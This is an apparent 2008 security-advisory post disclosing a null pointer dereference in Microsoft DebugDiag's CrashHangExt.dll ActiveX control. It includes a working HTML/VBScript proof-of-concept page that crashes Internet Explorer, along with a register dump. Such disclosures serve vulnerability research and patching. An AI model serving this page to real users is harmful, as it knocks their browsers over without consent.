DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference Oct 30 2008 09:57AM
crimson loyd gmail com
Name : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference

Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd (at) gmail (dot) com [email concealed]

Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-4
6f1-b24d-f60151d875a3&displaylang=en#Overview

Greetz : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo

Katharsis, all fron #dark-coders

=+ Product of Fuzzing +=

This code should crash down Internet Explorer

Tested on:

+ Windows XP SP2 (full patched) & IE 6.0 (full patched)

+ Windows 2000 SP 4 (full patched) & IE 6.0 (full patched)

Marked as:

================================================

Class Utils

GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA}

Number of Interfaces: 1

Default Interface: IUtils

RegKey Safe for Script: False

RegkeySafe for Init: False

KillBitSet: False

================================================

Exploit:

~~~~~~~~~~~~~~~~~~~~~~

-----------------------code.htm--------------------------

<body>

<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />

</object>

<script language='vbscript'>

arg1=-2147483647

target.GetEntryPointForThread arg1

</script>

</body>

-----------------------code.htm--------------------------

Info

~~~~~~~~~~~~~~~~~~~~~~

EAX 00000000

ECX 0012DDDC

EDX 001E98EA

EBX 02C318E8 CrashHan.02C318E8

ESP 0012DD88

EBP 0012DE04

ESI 023F1FE0

EDI 00000000

EIP 02C38290 CrashHan.02C38290

IE crashes while trying to execute this line (Null pointer dereference):

02C38290 8B08 MOV ECX,DWORD PTR DS:[EAX]

//www.dark-coders.pl

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus